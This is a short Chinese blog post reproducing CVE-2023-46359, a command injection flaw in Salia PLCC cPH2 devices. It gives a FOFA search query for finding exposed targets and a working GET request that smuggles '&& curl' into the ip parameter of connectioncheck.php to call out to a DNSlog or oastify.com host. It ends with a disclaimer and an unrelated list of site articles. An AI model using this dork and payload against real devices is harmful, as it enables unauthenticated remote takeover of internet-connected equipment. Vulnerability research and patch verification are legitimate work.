【漏洞复现】Salia PLCC cPH2 远程命令执行漏洞(CVE-2023-46359)

0x01 漏洞概述

Salia PLCC cPH2 v1.87.0 及更早版本中存在一个操作系统命令注入漏洞,该漏洞可能允许未经身份验证的远程攻击者通过传递给连接检查功能的特制参数在系统上执行任意命令。

0x02 测绘语句

fofa:"Salia PLCC"

0x03 漏洞复现

​
payload:GET /connectioncheck.php?
ip=url_encode(127.0.0.1 && curl http://dnslog) HTTP/1.1

漏洞复现:GET /connectioncheck.php?ip=127.0.0.1+%26%26+curl+http%3A%2F%2F4kpxqqvqog8u6p2ew6xzh3c7jypvdr1g.oastify.com HTTP/1.1

​

0x04 影响范围

cPH2 v<= 1.87.0

0x05 参考链接

https://github.com/projectdiscovery/nuclei-templates/blob/7f071a1f5a59a3a9812a58e990f266883607b30c/http/cves/2023/CVE-2023-46359.yaml#L12
 

0x06 免责声明

本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-10 21:16:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-10 21:16:03       100 阅读
  3. 在Django里面运行非项目文件

    2024-03-10 21:16:03       82 阅读
  4. Python语言-面向对象

    2024-03-10 21:16:03       91 阅读

热门阅读

  1. 代码随想录算法训练营day32

    2024-03-10 21:16:03       43 阅读
  2. 软考高级:UML 4+1 视图概念和例题

    2024-03-10 21:16:03       40 阅读
  3. UML统一建模语言在软件开发中作用

    2024-03-10 21:16:03       48 阅读
  4. POST和GET传值的方法

    2024-03-10 21:16:03       42 阅读
  5. 20个Python中列表(list)最常用的方法和函数。

    2024-03-10 21:16:03       44 阅读
  6. Spring Boot 入门教程

    2024-03-10 21:16:03       46 阅读
  7. LeetCode的使用方法

    2024-03-10 21:16:03       43 阅读
  8. 面向服务的架构SOA

    2024-03-10 21:16:03       39 阅读
  9. stm32 串口配置

    2024-03-10 21:16:03       42 阅读